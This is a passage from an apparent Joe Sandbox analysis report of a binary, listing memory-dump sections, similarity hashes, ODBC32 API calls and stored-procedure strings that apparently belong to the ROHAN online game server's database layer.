                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [EXTERN_SetOptionKeyInfo](?,?,?)}
                                                                                      • API String ID: 0-3867731170
                                                                                      • Opcode ID: a62a289daaf0303b3e25dcedc20457eaa3be9d64757515f262c05516c800b3e5
                                                                                      • Instruction ID: 7d26e8f64ec847dac86c99789775de0cf7bb6bc90522be936eb6030729ec32e9
                                                                                      • Opcode Fuzzy Hash: a62a289daaf0303b3e25dcedc20457eaa3be9d64757515f262c05516c800b3e5
                                                                                      • Instruction Fuzzy Hash: 4431D0B1A443187BFB38CF54CD92FAA7375EB84B14F108389F6156A2C5D9B26D40CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN_GetResultRevenge](?,?,?)},000000FD), ref: 0043E1F8
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043E23A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043E26F
                                                                                      • #72.ODBC32(?,00000000,00000004,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043E2A7
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000E7,000000FB,00000000), ref: 0043E2DF
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN_GetResultRevenge](?,?,?)}, xrefs: 0043E1EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN_GetResultRevenge](?,?,?)}
                                                                                      • API String ID: 0-1588943654
                                                                                      • Opcode ID: 4451da46a9d3cc26b9e5632598b2d6fd2d1b34971045f4e833ca65026f6a8955
                                                                                      • Instruction ID: daa56f715aa8caa7a363d683d2f1d9ad717dc2a2b20b1e17fc3f28480f81cb6d
                                                                                      • Opcode Fuzzy Hash: 4451da46a9d3cc26b9e5632598b2d6fd2d1b34971045f4e833ca65026f6a8955
                                                                                      • Instruction Fuzzy Hash: 0E3130B4640254BBFB24CB85CC12FE97379EB80B18F10C689F7592E2C5D5F269808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [Rohangame_pLucky_GetNumUser] (?, ?, ?)},000000FD), ref: 004417EA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00441836
                                                                                      • #72.ODBC32(?,00000000,00000001,0000005D,0000005D,00000013,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00441873
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,0000005D,0000005D,00000013), ref: 004418AB
                                                                                      • #72.ODBC32(?,00000000,00000004,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004418E3
                                                                                      Strings
                                                                                      • { ? = CALL [Rohangame_pLucky_GetNumUser] (?, ?, ?)}, xrefs: 004417E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [Rohangame_pLucky_GetNumUser] (?, ?, ?)}
                                                                                      • API String ID: 0-206787853
                                                                                      • Opcode ID: e1d5145c5eb57a391be92fad7a9ae2a0df8ee203e496160bde1eecdee47a255b
                                                                                      • Instruction ID: 1e3dfa3d8686171a63e0bc2666b51bdb11bbbceeead1865577d2db4bd5e9ce8f
                                                                                      • Opcode Fuzzy Hash: e1d5145c5eb57a391be92fad7a9ae2a0df8ee203e496160bde1eecdee47a255b
                                                                                      • Instruction Fuzzy Hash: 91310FB0A44314BBEB249B54CC52FDA7335FB84B18F2082C9F7242A6C5D5B16A81CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetNGuildWarInfoList] (?,?,?)},000000FD), ref: 004341B6
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004341F5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043422A
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00434262
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 0043429A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetNGuildWarInfoList] (?,?,?)}, xrefs: 004341AD
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_GetNGuildWarInfoList] (?,?,?)}
                                                                                      • API String ID: 0-2291583094
                                                                                      • Opcode ID: 784ccee29c7ec8bbadb21f0e9038acecd061330fb8c80b6f2903d037e98e5cb1
                                                                                      • Instruction ID: ce6b28d3cea759a8b91df333af4cfcf0b505e79d8caabac875db78b73f3255b3
                                                                                      • Opcode Fuzzy Hash: 784ccee29c7ec8bbadb21f0e9038acecd061330fb8c80b6f2903d037e98e5cb1
                                                                                      • Instruction Fuzzy Hash: 2F3112B0B443187BEB248F44CC52FAA7334EB85B14F144289F7196E6C4D6B66E80CF59
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_SetDivorce] (?,?,?)},000000FD), ref: 00435310
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043534F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00435384
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004353BC
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004353F4
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_SetDivorce] (?,?,?)}, xrefs: 00435307
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_SetDivorce] (?,?,?)}
                                                                                      • API String ID: 0-2317208128
                                                                                      • Opcode ID: 9668ab61eba10f5d371ea0b8e3332dfdd2148f428ba322abb482dcd88ccb3bc4
                                                                                      • Instruction ID: a4201f1dea53c3c4eb530cb841032f40aaafb2576785d5fc0b04eca3a10bf919
                                                                                      • Opcode Fuzzy Hash: 9668ab61eba10f5d371ea0b8e3332dfdd2148f428ba322abb482dcd88ccb3bc4
                                                                                      • Instruction Fuzzy Hash: 5831F2B06842147BEB248B44CD52FA9B335EB84B1CF108289FB1C6E2C6D7B56E508F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_ChangeGuildAuthority](?, ?, ?)},000000FD), ref: 0042D366
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042D3A5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042D3DA
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042D412
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000FA,000000FA,00000000), ref: 0042D44A
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_ChangeGuildAuthority](?, ?, ?)}, xrefs: 0042D35D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_ChangeGuildAuthority](?, ?, ?)}
                                                                                      • API String ID: 0-264154639
                                                                                      • Opcode ID: 7101c63cc750899af236b99e6ac25b18291eae923c200bd2bc2b392540c7bd61
                                                                                      • Instruction ID: 2278025119c68b87aab1bdc28dd0316a591bd20455cafacc75f147daaf819555
                                                                                      • Opcode Fuzzy Hash: 7101c63cc750899af236b99e6ac25b18291eae923c200bd2bc2b392540c7bd61
                                                                                      • Instruction Fuzzy Hash: 8A31FFF16442557BEB30CB44CC42FAE7376FB84B18F208289F7256E2C5D6B569808B5C
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_GetValidPeriod] (?,?,?)},000000FD), ref: 004344EA
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00434529
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043455E
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 00434596
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F1,00000005,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F1,00000005,00000000), ref: 004345CE
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_GetValidPeriod] (?,?,?)}, xrefs: 004344E1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
